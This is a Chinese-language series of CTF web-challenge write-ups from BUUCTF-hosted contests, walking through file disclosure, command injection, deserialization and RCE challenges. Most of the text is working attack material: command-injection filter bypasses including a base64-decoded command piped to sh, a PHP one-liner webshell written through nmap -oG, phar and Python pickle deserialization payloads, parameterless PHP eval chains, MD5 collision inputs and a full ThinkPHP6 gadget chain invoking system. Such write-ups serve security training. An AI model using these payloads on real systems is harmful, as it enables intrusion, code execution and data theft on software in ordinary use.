[RoarCTF 2019]Easy Java
WEB-INF/web.xml泄露
WEB-INF主要包含一下文件或目錄:
- /WEB-INF/web.xml:Web應用程序配置文件,描述了 servlet 和其他的應用組件配置及命名規則。
- /WEB-INF/classes/:含了站點所有用的 class 文件,包括 servlet class 和非servlet class,他們不能包含在 .jar文件中
- /WEB-INF/lib/:存放web應用需要的各種JAR文件,放置僅在這個應用中要求使用的jar文件,如數據庫驅動jar文件
- /WEB-INF/src/:源碼目錄,按照包名結構放置各個java文件。
- /WEB-INF/database.properties:數據庫配置文件
- 漏洞檢測以及利用方法:通過找到web.xml文件,推斷class文件的路徑,最後直接class文件,在通過反編譯class文件,得到網站源碼
Download
當點擊help
的的時候,會跳轉到http://61267db4-f9c8-4c27-bb24-90f51720ca54.node3.buuoj.cn/Download?filename=help.docx
而返回的信息卻是java.io.FileNotFoundException:{help.docx}
換成post傳入filename=WEB-INF/web.xml
,下載WEB-INF_web.xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0">
<welcome-file-list>
<welcome-file>Index</welcome-file>
</welcome-file-list>
<servlet>
<servlet-name>IndexController</servlet-name>
<servlet-class>com.wm.ctf.IndexController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>IndexController</servlet-name>
<url-pattern>/Index</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>LoginController</servlet-name>
<servlet-class>com.wm.ctf.LoginController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>LoginController</servlet-name>
<url-pattern>/Login</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>DownloadController</servlet-name>
<servlet-class>com.wm.ctf.DownloadController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadController</servlet-name>
<url-pattern>/Download</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>FlagController</servlet-name>
<servlet-class>com.wm.ctf.FlagController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>FlagController</servlet-name>
<url-pattern>/Flag</url-pattern>
</servlet-mapping>
</web-app>
看到com.wm.ctf.FlagController
傳入filename=WEB-INF/classes/com/wm/ctf/FlagController.class
得到class文件
FlagController
<ZmxhZ3s4N2Y1M2E0My00N2JjLTQzNTQtYTYzOS0wNGYwYzA2ZTM0NjJ9Cg==
base64解碼得到flag
[GXYCTF2019]Ping Ping Ping
先傳一個ip=127.0.0.1|ls
試試水,發現flag.php和index.php
接着ip=127.0.0.1|cat flag.php
,發現空格被ban了
命令執行繞過空格
$IFS
${IFS}
$IFS$9
<
<>
{cat,flag.php}
%20
%09
linux命令中可以加\,當禁用cat時可以ca\t /fl\ag
先讀一下index.php:ip=127.0.0.1;cat$IFS$9index.php
連flag的貪婪匹配都被ban了,只能用別的辦法代替flag
命令執行變量拼接
ip=127.0.0.1;a=g;cat$IFS$9fla$a.php
過濾bash用sh執行
ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
內聯執行
將反引號內命令的輸出作爲輸入執行
ip=127.0.0.1;cat$IFS$9`ls`
[ZJCTF 2019]NiZhuanSiWei
<?php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
echo "Not now!";
exit();
}else{
include($file); //useless.php
$password = unserialize($password);
echo $password;
}
}
else{
highlight_file(__FILE__);
}
?>
第一層:data僞協議
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))
傳入一個文件且內容爲welcome to the zjctf,先用data協議寫入文件,再用file_get_contents函數讀取
text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
第二層:php僞協議
text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php
讀取到useless.php的內容如下:
<?php
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
第三層:反序列化
序列化POC
<?php
class Flag{
public $file="flag.php";
}
$a = new Flag();
echo serialize($a);
?>
得到序列化數組爲O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
最終payload:http://e85fdb29-4b66-42f4-ad10-ffcfe03c958a.node3.buuoj.cn/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;}
[BUUCTF 2018]Online Tool
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
escapeshellarg繞過
GET傳參給host變量,經過escapeshellarg()及escapeshellcmd()函數過濾之後,使用system命令執行nmap
這兩個函數本是沒有漏洞的,但是組合使用時,就會產生漏洞,參考鏈接如下:
http://www.lmxspace.com/2018/07/16/%E8%B0%88%E8%B0%88escapeshellarg%E5%8F%82%E6%95%B0%E7%BB%95%E8%BF%87%E5%92%8C%E6%B3%A8%E5%85%A5%E7%9A%84%E9%97%AE%E9%A2%98/
這篇文章講的非常詳細,這裏就只簡單提一下
傳入參數:172.17.0.2' -v -d a=1
經過escapeshellarg處理後變成了'172.17.0.2'\'' -v -d a=1',即先對單引號轉義,再用單引號將左右兩部分括起來從而起到連接的作用。
經過escapeshellcmd處理後變成'172.17.0.2'\\'' -v -d a=1\',因爲escapeshellcmd對\以及最後那個不配對兒的引號進行了轉義
最後執行的命令是curl '172.17.0.2'\\'' -v -d a=1\',由於中間的\\被解釋爲\而不再是轉義字符,所以後面的'沒有被轉義,與再後面的'配對兒成了一個空白連接符。所以可以簡化爲curl 172.17.0.2\ -v -d a=1',即向172.17.0.2\發起請求,POST 數據爲a=1'。
nmap寫入文件
nmap有一個參數-oG可以實現將命令和結果寫到文件,我們可以控制自己的輸入寫入文件,這裏我們可以寫入一句話木馬鏈接,也可以直接命令 cat flag
最終payload:````?host=
’ <?php echo `cat /flag`;?> -oG test.php '` ```
url再帶上mkdir創建的目錄,訪問test.php即可獲得flag
http://9be60af2-192d-4eb7-abdf-b8b686e864d7.node3.buuoj.cn/2fb73c2b040f6abe4d03e2053aa8aab3/test.php
[SUCTF 2019]Pythonginx
from flask import Flask, Blueprint, request, Response, escape ,render_template
from urllib.parse import urlsplit, urlunsplit, unquote
from urllib import parse
import urllib.request
app = Flask(__name__)
# Index
@app.route('/', methods=['GET'])
def app_index():
return render_template('index.html')
@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
url = request.args.get("url")
host = parse.urlparse(url).hostname
if host == 'suctf.cc':
return "我扌 your problem? 111"
parts = list(urlsplit(url))
host = parts[1]
if host == 'suctf.cc':
return "我扌 your problem? 222 " + host
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
#去掉 url 中的空格
finalUrl = urlunsplit(parts).split(' ')[0]
host = parse.urlparse(finalUrl).hostname
if host == 'suctf.cc':
return urllib.request.urlopen(finalUrl).read()
else:
return "我扌 your problem? 333"
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)
前兩個判斷 host 是否是 suctf.cc ,如果不是才能繼續。然後第三個經過了 decode(‘utf-8’) 之後傳進了 urlunsplit 函數,在第三個判斷中又必須要等於 suctf.cc 纔行。
CVE-2019-9636:urlsplit不處理NFKC標準化
預期解
black hat 2019的一個議題,雖然我沒看,但還是貼出來
https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf
當傳入的url爲http://evil.c℀.com在經過處理過後便成爲了http://evil.ca/c.com
在unicode中字符℀(U+2100),當IDNA處理此字符時,會將℀變成a/c,因此當你訪問此url時,dns服務器會自動將url重定向到另一個網站。如果服務器引用前端url時,只對域名做了限制,那麼通過這種方法,我們就可以輕鬆繞過服務器對域名的限制了。
nginx重要文件位置
- 配置文件存放目錄:/etc/nginx
- 主配置文件:/etc/nginx/conf/nginx.conf 或 /etc/nginx/nginx.conf
- 管理腳本:/usr/lib64/systemd/system/nginx.service
- 模塊:/usr/lisb64/nginx/modules
- 應用程序:/usr/sbin/nginx
- 程序默認存放位置:/usr/share/nginx/html
- 日誌默認存放位置:/var/log/nginx
Payload
讀取nginx.conf:
getUrl?url=file://suctf.c℆sr/local/nginx/conf/nginx.conf
讀取flag:
getUrl?url=file://suctf.c℆sr/fffffflag
[CISCN2019 華北賽區 Day1 Web1]Dropbox
任意文件下載
隨便註冊一個賬號登錄後跳到網盤頁面,只能上傳圖片,上傳後可以下載
抓包修改filename依次讀取download.php、delete.php及class.php
download.php
<?php
session_start();
if (!isset($_SESSION['login'])) {
header("Location: login.php");
die();
}
if (!isset($_POST['filename'])) {
die();
}
include "class.php";
ini_set("open_basedir", getcwd() . ":/etc:/tmp");
chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) {
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=" . basename($filename));
echo $file->close();
} else {
echo "File not exist";
}
?>
delete.php
<?php
session_start();
if (!isset($_SESSION['login'])) {
header("Location: login.php");
die();
}
if (!isset($_POST['filename'])) {
die();
}
include "class.php";
chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
$file->detele();
Header("Content-type: application/json");
$response = array("success" => true, "error" => "");
echo json_encode($response);
} else {
Header("Content-type: application/json");
$response = array("success" => false, "error" => "File not exist");
echo json_encode($response);
}
?>
class.php
<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);
class User {
public $db;
public function __construct() {
global $db;
$this->db = $db;
}
public function user_exist($username) {
$stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->store_result();
$count = $stmt->num_rows;
if ($count === 0) {
return false;
}
return true;
}
public function add_user($username, $password) {
if ($this->user_exist($username)) {
return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
return true;
}
public function verify_user($username, $password) {
if (!$this->user_exist($username)) {
return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->bind_result($expect);
$stmt->fetch();
if (isset($expect) && $expect === $password) {
return true;
}
return false;
}
public function __destruct() {
$this->db->close();
}
}
class FileList {
private $files;
private $results;
private $funcs;
public function __construct($path) {
$this->files = array();
$this->results = array();
$this->funcs = array();
$filenames = scandir($path);
$key = array_search(".", $filenames);
unset($filenames[$key]);
$key = array_search("..", $filenames);
unset($filenames[$key]);
foreach ($filenames as $filename) {
$file = new File();
$file->open($path . $filename);
array_push($this->files, $file);
$this->results[$file->name()] = array();
}
}
public function __call($func, $args) {
array_push($this->funcs, $func);
foreach ($this->files as $file) {
$this->results[$file->name()][$func] = $file->$func();
}
}
public function __destruct() {
$table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
$table .= '<thead><tr>';
foreach ($this->funcs as $func) {
$table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
}
$table .= '<th scope="col" class="text-center">Opt</th>';
$table .= '</thead><tbody>';
foreach ($this->results as $filename => $result) {
$table .= '<tr>';
foreach ($result as $func => $value) {
$table .= '<td class="text-center">' . htmlentities($value) . '</td>';
}
$table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">涓嬭澆</a> / <a href="#" class="delete">鍒犻櫎</a></td>';
$table .= '</tr>';
}
echo $table;
}
}
class File {
public $filename;
public function open($filename) {
$this->filename = $filename;
if (file_exists($filename) && !is_dir($filename)) {
return true;
} else {
return false;
}
}
public function name() {
return basename($this->filename);
}
public function size() {
$size = filesize($this->filename);
$units = array(' B', ' KB', ' MB', ' GB', ' TB');
for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
return round($size, 2).$units[$i];
}
public function detele() {
unlink($this->filename);
}
public function close() {
return file_get_contents($this->filename);
}
}
?>
phar反序列化
關於這方面的知識,看看hu3sky師傅這篇文章就差不多了
https://xz.aliyun.com/t/2715#toc-16
拓展面:https://paper.seebug.org/680
<?php
// add object of any class as meta data
class User
{
public $db;
}
class FileList
{
private $files;
public function __construct()
{
$this->files=array(new File());
}
}
class File
{
public $filename='/flag.txt';
}
$b=new FileList();
$c=new User();
$c->db=$b;
// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($c);
$phar->stopBuffering();
?>
把生成的phar文件上傳,抓包修改爲phar.gif,修改MIME類型
最後再刪除,將filename改爲phar://phar.gif
[CISCN2019 華北賽區 Day1 Web2]ikun
邏輯漏洞
ikun們爆破*站當然要買lv6啦,審查元素髮現等級圖標的命名爲lvX.png
寫個腳本找到lv6的號
import requests
url = "http://de62edf4-5892-49f6-9bd7-50e0d1e67b86.node3.buuoj.cn/shop?page="
for i in range(1000):
r = requests.get(url+str(i))
if "lv6.png" in r.text:
print(i)
break
最後在第181頁找到lv6的賬號,抓包看支付請求
這裏只能改折扣到足夠小,改到0或是改價格都會錯誤,改完之後跳轉到b1g_m4mber
頁面
jwt-cookies僞造
關於JWT(Json web token)可以看下面這篇文章
https://www.jianshu.com/p/576dbf44b2ae
要想僞造jwt,首先要反推出私鑰
最後僞造出admin的jwt並修改,以admin身份登錄
F12發現hint,www.zip源碼泄露/static/asd1f654e683wq/www.zip
python反序列化
payload:
import pickle
import urllib
class payload(object):
def __reduce__(self):
return (eval, ("open('/flag.txt','r').read()",))
a = pickle.dumps(payload())
a = urllib.quote(a)
print a
用運行得到的結果替代原有become參數,即可帶出flag
[GXYCTF2019]禁止套娃
.git源碼泄露,不再贅述
<?php
include "flag.php";
echo "flag在哪裏呢?<br>";
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// echo $_GET['exp'];
@eval($_GET['exp']);
}
else{
die("還差一點哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("還想讀flag,臭弟弟!");
}
}
// highlight_file(__FILE__);
?>
無參數RCE
推薦兩篇文章:https://www.cnblogs.com/wangtanzhi/p/12311239.html
https://www.gem-love.com/ctf/530.html#%E5%A6%82%E4%BD%95%E5%BE%97%E5%88%B0%E6%96%87%E4%BB%B6%E5%90%8Dflag.php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']);}
preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)
pre_match('/et|na|nt|strlen|info|path||rand|dec|bin|hex|oct|pi|exp|log/i', $code))
preg_replace 的主要功能就是限制我們傳輸進來的必須是純小寫字母的函數,而且不能攜帶參數。
再來看一下:(?R)?,這個意思爲遞歸整個匹配模式。所以正則的含義就是匹配無參數的函數,內部可以無限嵌套相同的模式(無參數函數)
相關函數
- localeconv() 函數返回一包含本地數字及貨幣格式信息的數組
- scandir() 列出當前目錄和文件
- readfile() 函數讀取一個文件,並寫入到輸出緩衝
- highlight_file() 文件高亮顯示
- next() 輸出數組中的下一個元素的值
- array_reverse() 相反的元素順序返回數組
先掃出當前文件
print_r(scandir(current(localeconv())));
或
print_r(scandir(pos(localeconv())));
逆序返回數組
print_r(array_reverse(scandir(current(localeconv()))));
輸出數組下一個元素
print_r(next(array_reverse(scandir(pos(localeconv())))));
讀取flag
highlight_file(next(array_reverse(scandir(pos(localeconv())))));
或
view-source:http://85aecbd4-ce26-4171-95b5-7c7a13006363.node3.buuoj.cn/?exp=print_r(readfile(next(array_reverse(scandir(pos(localeconv()))))));
也可以隨機取出元素並讀取
highlight_file(array_rand(array_flip(scandir(current(localeconv())))));
session_id(session_start())
[安洵杯 2019]easy_web
http://xxx/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=
base64->base64->hex,解碼後爲555.png,嘗試讀取index.php
TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
?>
<html>
<style>
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
md5強碰撞
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
關於自制值相同而md5不同的數據,可以參考這篇文章https://xz.aliyun.com/t/2232
post數據如下:
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
非預期:反斜槓逃逸命令執行
cmd=ca\t%20/flag
sort命令
cmd=sort%20/flag
Linux sort命令用於將文本文件內容加以排序。
sort可針對文本文件的內容,以行爲單位來排序。
[安洵杯 2019]iamthinking
thinkphp6反序列化
www.zip拿到源碼,構造thinkphp6反序列化,同時需要繞過parse_url
exp:
<?php
namespace think {
use think\model\concern\Attribute;
use think\model\concern\Conversion;
use think\model\concern\RelationShip;
abstract class Model
{
use Conversion;
use RelationShip;
use Attribute;
private $lazySave;
protected $table;
public function __construct($obj)
{
$this->lazySave = true;
$this->table = $obj;
$this->visible = array(array('hu3sky'=>'aaa'));
$this->relation = array("hu3sky"=>'aaa');
$this->data = array("a"=>'cat /flag');
$this->withAttr = array("a"=>"system");
}
}
}
namespace think\model\concern {
trait Conversion
{
protected $visible;
}
trait RelationShip
{
private $relation;
}
trait Attribute
{
private $data;
private $withAttr;
}
}
namespace think\model {
class Pivot extends \think\Model
{
}
}
namespace {
$a = new think\model\Pivot('');
$b = new think\model\Pivot($a);
echo urlencode(serialize($b));
}
payload:///public/?payload=O%3A17%3A"think%5Cmodel%5CPivot"%3A6%3A%7Bs%3A21%3A"%00think%5CModel%00lazySave"%3Bb%3A1%3Bs%3A8%3A"%00%2A%00table"%3BO%3A17%3A"think%5Cmodel%5CPivot"%3A6%3A%7Bs%3A21%3A"%00think%5CModel%00lazySave"%3Bb%3A1%3Bs%3A8%3A"%00%2A%00table"%3Bs%3A0%3A""%3Bs%3A10%3A"%00%2A%00visible"%3Ba%3A1%3A%7Bi%3A0%3Ba%3A1%3A%7Bs%3A6%3A"hu3sky"%3Bs%3A3%3A"aaa"%3B%7D%7Ds%3A21%3A"%00think%5CModel%00relation"%3Ba%3A1%3A%7Bs%3A6%3A"hu3sky"%3Bs%3A3%3A"aaa"%3B%7Ds%3A17%3A"%00think%5CModel%00data"%3Ba%3A1%3A%7Bs%3A1%3A"a"%3Bs%3A9%3A"cat+%2Fflag"%3B%7Ds%3A21%3A"%00think%5CModel%00withAttr"%3Ba%3A1%3A%7Bs%3A1%3A"a"%3Bs%3A6%3A"system"%3B%7D%7Ds%3A10%3A"%00%2A%00visible"%3Ba%3A1%3A%7Bi%3A0%3Ba%3A1%3A%7Bs%3A6%3A"hu3sky"%3Bs%3A3%3A"aaa"%3B%7D%7Ds%3A21%3A"%00think%5CModel%00relation"%3Ba%3A1%3A%7Bs%3A6%3A"hu3sky"%3Bs%3A3%3A"aaa"%3B%7Ds%3A17%3A"%00think%5CModel%00data"%3Ba%3A1%3A%7Bs%3A1%3A"a"%3Bs%3A9%3A"cat+%2Fflag"%3B%7Ds%3A21%3A"%00think%5CModel%00withAttr"%3Ba%3A1%3A%7Bs%3A1%3A"a"%3Bs%3A6%3A"system"%3B%7D%7D